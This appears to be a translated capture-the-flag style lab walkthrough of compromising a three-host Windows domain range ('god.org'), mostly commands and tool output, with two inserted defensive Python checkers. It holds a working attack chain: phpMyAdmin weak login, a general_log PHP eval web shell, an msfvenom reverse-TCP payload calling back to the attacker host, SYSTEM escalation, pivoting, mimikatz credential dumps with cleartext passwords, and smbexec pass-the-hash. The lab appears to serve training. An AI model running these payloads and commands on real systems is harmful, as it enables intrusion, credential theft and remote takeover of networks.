Kali
192.168.35.128
===============================================================================
Layer 1 target: Win7
192.168.35.153
192.168.52.143
===============================================================================
Layer 2 target: Metasploitable
192.168.52.141
===============================================================================
Layer 3 target: WinServer2008
192.168.52.138
Layer 1 host
Live host scan
- nmap -sP 192.168.35.0/24
└─# nmap -sP 192.168.35.0/24
===================================================
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-03 21:43 EST
Nmap scan report for 192.168.35.1
Host is up (0.00025s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.35.2
Host is up (0.00012s latency).
MAC Address: 00:50:56:F0:F5:B1 (VMware)
Nmap scan report for 192.168.35.153 =====> suspected live host
Host is up (0.00019s latency).
MAC Address: 00:0C:29:A7:C1:B2 (VMware)
Nmap scan report for 192.168.35.254
Host is up (0.00012s latency).
MAC Address: 00:50:56:EC:7B:6C (VMware)
Nmap scan report for 192.168.35.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.98 seconds
192.168.35.135 ===> suspected live host IP address
Port scan
- nmap -PS 192.168.35.153
└─# nmap -PS 192.168.35.153
==============================================================================
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-03 21:45 EST
Nmap scan report for 192.168.35.153
Host is up (0.00034s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
3306/tcp open mysql
MAC Address: 00:0C:29:A7:C1:B2 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 18.02 seconds
Information gathering
Visit 192.168.35.143:80
Homepage title: phpStudy探针2014 (phpStudy probe 2014)
Absolute path: C:/phpStudy/WWW
Probe path: C:/phpStudy/WWW/l.php
PHP version: 5.4.45
Directory scan
[22:11:24] 200 - 71KB - /phpinfo.php
[22:11:24] 301 - 241B - /phpMyAdmin -> http://192.168.35.153/phpMyAdmin/
[22:11:24] 301 - 241B - /phpmyadmin -> http://192.168.35.153/phpmyadmin/
[22:11:25] 200 - 2KB - /phpmyadmin/README
[22:11:25] 200 - 32KB - /phpmyadmin/ChangeLog
[22:11:25] 200 - 4KB - /phpmyadmin/index.php
[22:11:25] 200 - 4KB - /phpMyAdmin/index.php
[22:11:25] 200 - 4KB - /phpmyAdmin/
[22:11:25] 200 - 4KB - /phpmyadmin/
[22:11:25] 200 - 4KB - /phpMyAdmin/
[22:11:25] 200 - 4KB - /phpMyadmin/
phpMyAdmin
Test weak credentials
- Username: root
- Password: root
Search online for known phpMyAdmin vulnerabilities
The reproduction steps are as follows:
general log:off ===> general log:on
general log file ===> C:/phpStudy/WWW/1.php
payload: SELECT '<?php @eval($_REQUEST[6]);?>'
==> note the single quotes here; double quotes cause an error
Get a shell
Test the connection with AntSword (蚁剑)
Privilege escalation
Method 1: MsfVenom
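As an added defensive check (not part of the original writeup): the general_log trick above only works when general_log is ON and general_log_file points at a script file under the web root (C:/phpStudy/WWW here). The function below takes a dict of MySQL global variables, as you would get from SHOW GLOBAL VARIABLES, and a list of web roots, and flags that combination; the variable values and the svc_backup-style sample settings are constructed, and Windows path semantics are assumed.

```python
"""Flag a MySQL general_log configured to write into a web root."""
from pathlib import PureWindowsPath

# Extensions a web server would execute if the log file is requested over HTTP.
SCRIPT_SUFFIXES = {".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx"}


def _parts(path):
    """Split a Windows path into lower-cased components (Windows paths are case-insensitive)."""
    return [p.lower() for p in PureWindowsPath(path).parts]


def check_general_log(variables, web_roots):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    log_on = variables.get("general_log", "OFF").upper() == "ON"
    log_file = variables.get("general_log_file", "")
    suffix = PureWindowsPath(log_file).suffix.lower()

    log_parts = _parts(log_file)
    in_webroot = any(log_parts[:len(_parts(root))] == _parts(root) for root in web_roots)

    if in_webroot:
        findings.append(f"general_log_file is inside a web root: {log_file}")
    if suffix in SCRIPT_SUFFIXES:
        findings.append(f"general_log_file has a script extension: {suffix}")
    if log_on and findings:
        findings.append("general_log is ON: every query is written to that file immediately")
    return findings


# Constructed samples: a normal data-directory log and the setting used in the writeup.
SAFE = {"general_log": "OFF", "general_log_file": "C:\\phpStudy\\MySQL\\data\\stu1.log"}
ABUSED = {"general_log": "ON", "general_log_file": "C:/phpStudy/WWW/1.php"}
WEB_ROOTS = ["C:/phpStudy/WWW"]

if __name__ == "__main__":
    for name, cfg in (("safe", SAFE), ("abused", ABUSED)):
        print(name, check_general_log(cfg, WEB_ROOTS) or ["ok"])
```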
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.35.128 LPORT=9527 -f exe > shell.exe
Upload the payload file to the target host, start a listener on Kali with the multi/handler module, then run the uploaded file from AntSword to get a session; this time privilege escalation works directly.
meterpreter > getuid
Server username: GOD\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Method 2: CS (Cobalt Strike)
Start CS on Kali / Win10
Generate a payload with CS, upload it to the target server, run it, then escalate privileges directly
Layer 2 host
Information gathering
With the first-layer host already compromised, we use it as a pivot to scan the internal network
First run ipconfig to check the IP addresses
Two IP addresses were found:
192.168.35.153
192.168.52.143
====> and a domain was found to exist
域名 主 DNS 后缀 . . . . . . . . . . . : god.org
Scan the internal network from Kali through a proxy
This shows that 192.168.52.0/24 is the internal segment; we need to go through a proxy for internal penetration
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] No routes have been added yet
meterpreter > run autoroute -s 192.168.52.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.52.0/255.255.255.0...
[+] Added route to 192.168.52.0/255.255.255.0 via 192.168.35.153
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.52.0 255.255.255.0 Session 1
Without a route for the 192.168.52.0/24 segment we cannot reach internal addresses, so we need to add a route
Run proxychains4 nmap -sP 192.168.52.0/24
Result: every host in the /24 shows as alive ===> scanning through the proxy from Kali does not work properly, so we switched to CS for the /24 scan
Scan for live internal hosts with CS
Upload nbtscan to the target server and run it
Live hosts found:
- 192.168.52.138
- 192.168.52.141
- 192.168.52.143 ==> this host's own IP
Port scan
beacon> portscan 192.168.52.0-192.168.52.255 23,3389,445 arp 1024
[*] Tasked beacon to scan ports 23,3389,445 on 192.168.52.0-192.168.52.255
[+] host called home, sent: 93285 bytes
[+] received output:
(ARP) Target '192.168.52.1' is alive. 00-50-56-C0-00-01
[+] received output:
(ARP) Target '192.168.52.143' is alive. 00-0C-29-A7-C1-A8
(ARP) Target '192.168.52.138' is alive. 00-0C-29-3F-5D-A9
(ARP) Target '192.168.52.141' is alive. 00-0C-29-6D-39-34
[+] received output:
(ARP) Target '192.168.52.254' is alive. 00-50-56-F3-FB-8A
[+] received output:
192.168.52.1:445
192.168.52.138:445 (platform: 500 version: 6.1 name: OWA domain: GOD)
192.168.52.141:445 (platform: 500 version: 5.2 name: ROOT-TVI862UBEH domain: GOD)
192.168.52.143:445 (platform: 500 version: 6.1 name: STU1 domain: GOD)
Scanner module is complete
Summary: port 445 is open on all of them, so we can use PTH (pass-the-hash)
Lateral movement
First use the privileges we obtained to dump the target host's hashes
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82541 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
7f274332b7a2e4623bb7d86fb340c8f3
Combined with the earlier port scan, we use the exploit/windows/smb/psexec module for lateral movement
Result: all of them failed!!!
Then we used the impacket toolkit for lateral movement. Click Run Mimikatz:
Authentication Id : 0 ; 1906011 (00000000:001d155b)
Session : Interactive from 1
User Name : Administrator
Domain : GOD
Logon Server : OWA
Logon Time : 2024/3/4 17:02:13
SID : S-1-5-21-2952760202-1353902439-2381784089-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : GOD
* LM : 6139ff1072a8d0fe1e929ffc01395127
* NTLM : 7f274332b7a2e4623bb7d86fb340c8f3 ========> this hash differs from the hash above; looking it up shows it corresponds to the password Aa@123456
* SHA1 : fbf44607ca7c0e989adee2673478f81266a4d3fe
tspkg :
* Username : Administrator
* Domain : GOD
* Password : Aa@123456
wdigest :
* Username : Administrator
* Domain : GOD
* Password : Aa@123456
kerberos :
* Username : Administrator
* Domain : GOD.ORG
* Password : Aa@123456
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/3/4 17:01:40
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : STU1$
Domain : GOD
Logon Server : (null)
Logon Time : 2024/3/4 17:01:40
SID : S-1-5-20
msv :
[00000003] Primary
* Username : STU1$
* Domain : GOD
* NTLM : 8e13aa48490fd42d88155fdc788ac265
* SHA1 : 41a638b7124b34680806801699a0310d1cdeb483
tspkg :
wdigest :
* Username : STU1$
* Domain : GOD
* Password : 1d 0c f2 4b 68 fc dd 8d d0 ab 78 6f 91 2b a5 cd e0 61 29 7f dc b9 56 3d 82 fe ea 29 8b 51 ee a9 e3 b3 bb 15 2d 43 79 2c ce a2 4a 42 a3 14 97 d9 8c 04 98 00 5a 75 72 e6 cb d7 b0 a8 72 87 db c0 04 d0 f0 9c 09 7d 6e 0a a7 b1 bb 05 bd ec 09 8d 8c a0 90 fc ad 8d 34 05 28 2e 94 31 af fa fd 12 da 56 24 cc b1 d4 c1 ed f1 74 94 28 95 59 6f 5d b9 25 03 8a 45 a0 1f 5b 98 d5 e0 3c 09 35 eb dd 1d f8 fa a5 2b 46 39 e0 ac e2 e1 f6 b3 8e 9a 01 15 a3 92 0c 6c c5 92 cd 45 63 04 65 a2 3a 17 ac 19 62 1e 1e 57 2a 12 43 ce 82 e4 4c c1 5c 96 09 f5 b6 60 eb 55 eb ac 33 9d 1b 54 39 5e b7 6c 02 71 67 a4 72 01 b4 b7 fb eb 96 10 42 52 8a cb ba 91 b1 7f 91 4d dd 3a a7 2c b3 d5 41 27 7e b7 c9 10 cd 37 0b ad 2c 6f 57 aa 8e 75 7b 5b c3 91 2d
kerberos :
* Username : stu1$
* Domain : GOD.ORG
* Password : 1d 0c f2 4b 68 fc dd 8d d0 ab 78 6f 91 2b a5 cd e0 61 29 7f dc b9 56 3d 82 fe ea 29 8b 51 ee a9 e3 b3 bb 15 2d 43 79 2c ce a2 4a 42 a3 14 97 d9 8c 04 98 00 5a 75 72 e6 cb d7 b0 a8 72 87 db c0 04 d0 f0 9c 09 7d 6e 0a a7 b1 bb 05 bd ec 09 8d 8c a0 90 fc ad 8d 34 05 28 2e 94 31 af fa fd 12 da 56 24 cc b1 d4 c1 ed f1 74 94 28 95 59 6f 5d b9 25 03 8a 45 a0 1f 5b 98 d5 e0 3c 09 35 eb dd 1d f8 fa a5 2b 46 39 e0 ac e2 e1 f6 b3 8e 9a 01 15 a3 92 0c 6c c5 92 cd 45 63 04 65 a2 3a 17 ac 19 62 1e 1e 57 2a 12 43 ce 82 e4 4c c1 5c 96 09 f5 b6 60 eb 55 eb ac 33 9d 1b 54 39 5e b7 6c 02 71 67 a4 72 01 b4 b7 fb eb 96 10 42 52 8a cb ba 91 b1 7f 91 4d dd 3a a7 2c b3 d5 41 27 7e b7 c9 10 cd 37 0b ad 2c 6f 57 aa 8e 75 7b 5b c3 91 2d
ssp :
credman :
Authentication Id : 0 ; 52183 (00000000:0000cbd7)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2024/3/4 17:01:40
SID :
msv :
[00000003] Primary
* Username : STU1$
* Domain : GOD
* NTLM : 8e13aa48490fd42d88155fdc788ac265
* SHA1 : 41a638b7124b34680806801699a0310d1cdeb483
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : STU1$
Domain : GOD
Logon Server : (null)
Logon Time : 2024/3/4 17:01:40
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : STU1$
* Domain : GOD
* Password : 1d 0c f2 4b 68 fc dd 8d d0 ab 78 6f 91 2b a5 cd e0 61 29 7f dc b9 56 3d 82 fe ea 29 8b 51 ee a9 e3 b3 bb 15 2d 43 79 2c ce a2 4a 42 a3 14 97 d9 8c 04 98 00 5a 75 72 e6 cb d7 b0 a8 72 87 db c0 04 d0 f0 9c 09 7d 6e 0a a7 b1 bb 05 bd ec 09 8d 8c a0 90 fc ad 8d 34 05 28 2e 94 31 af fa fd 12 da 56 24 cc b1 d4 c1 ed f1 74 94 28 95 59 6f 5d b9 25 03 8a 45 a0 1f 5b 98 d5 e0 3c 09 35 eb dd 1d f8 fa a5 2b 46 39 e0 ac e2 e1 f6 b3 8e 9a 01 15 a3 92 0c 6c c5 92 cd 45 63 04 65 a2 3a 17 ac 19 62 1e 1e 57 2a 12 43 ce 82 e4 4c c1 5c 96 09 f5 b6 60 eb 55 eb ac 33 9d 1b 54 39 5e b7 6c 02 71 67 a4 72 01 b4 b7 fb eb 96 10 42 52 8a cb ba 91 b1 7f 91 4d dd 3a a7 2c b3 d5 41 27 7e b7 c9 10 cd 37 0b ad 2c 6f 57 aa 8e 75 7b 5b c3 91 2d
kerberos :
* Username : stu1$
* Domain : GOD.ORG
* Password : 1d 0c f2 4b 68 fc dd 8d d0 ab 78 6f 91 2b a5 cd e0 61 29 7f dc b9 56 3d 82 fe ea 29 8b 51 ee a9 e3 b3 bb 15 2d 43 79 2c ce a2 4a 42 a3 14 97 d9 8c 04 98 00 5a 75 72 e6 cb d7 b0 a8 72 87 db c0 04 d0 f0 9c 09 7d 6e 0a a7 b1 bb 05 bd ec 09 8d 8c a0 90 fc ad 8d 34 05 28 2e 94 31 af fa fd 12 da 56 24 cc b1 d4 c1 ed f1 74 94 28 95 59 6f 5d b9 25 03 8a 45 a0 1f 5b 98 d5 e0 3c 09 35 eb dd 1d f8 fa a5 2b 46 39 e0 ac e2 e1 f6 b3 8e 9a 01 15 a3 92 0c 6c c5 92 cd 45 63 04 65 a2 3a 17 ac 19 62 1e 1e 57 2a 12 43 ce 82 e4 4c c1 5c 96 09 f5 b6 60 eb 55 eb ac 33 9d 1b 54 39 5e b7 6c 02 71 67 a4 72 01 b4 b7 fb eb 96 10 42 52 8a cb ba 91 b1 7f 91 4d dd 3a a7 2c b3 d5 41 27 7e b7 c9 10 cd 37 0b ad 2c 6f 57 aa 8e 75 7b 5b c3 91 2d
ssp :
credman :
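An added example (not part of the original writeup) to explain why the hashdump output earlier lists 31d6cfe0d16ae931b73c59d7e0c089c0 for every account while mimikatz above reports a different NTLM for GOD\Administrator: hashdump reads the local SAM, and 31d6cfe0... is the NT hash of the empty string (aad3b435... the matching empty LM hash), so those local accounts have blank passwords, whereas mimikatz reads the GOD domain logon session cached in LSASS. The parser below audits pwdump-format lines for that condition; the hashdump lines are the page's own and the svc_backup line is constructed.

```python
"""Audit pwdump-style hashdump lines (user:rid:lm:nt:::) for weak credential state."""
import re

# Well-known hashes of the empty password (LM and NT respectively).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)


def parse_pwdump_line(line):
    """Return a dict for one pwdump line, or None if the line is not in that format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["rid"] = int(rec["rid"])
    rec["lm"] = rec["lm"].lower()
    rec["nt"] = rec["nt"].lower()
    return rec


def audit_hashdump(text):
    """Map each account to 'empty-password', 'lm-hash-present' (legacy LM stored) or 'ok'."""
    verdicts = {}
    for line in text.splitlines():
        rec = parse_pwdump_line(line)
        if rec is None:
            continue  # skip banners, blank lines and anything not in pwdump format
        if rec["nt"] == EMPTY_NT:
            verdicts[rec["user"]] = "empty-password"
        elif rec["lm"] != EMPTY_LM:
            verdicts[rec["user"]] = "lm-hash-present"
        else:
            verdicts[rec["user"]] = "ok"
    return verdicts


# Sample input: the three hashdump lines from this writeup plus one constructed
# account with LM disabled and a non-empty (illustrative, not real) NT hash.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""

if __name__ == "__main__":
    for user, verdict in audit_hashdump(SAMPLE).items():
        print(f"{user}: {verdict}")
```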
- python3 smbexec.py -hashes :7f274332b7a2e4623bb7d86fb340c8f3 GOD/Administrator@192.168.52.141
- python3 smbexec.py -hashes :7f274332b7a2e4623bb7d86fb340c8f3 GOD/Administrator@192.168.52.138
Running the commands above completes the lateral movement
Access to the remaining 2 servers was obtained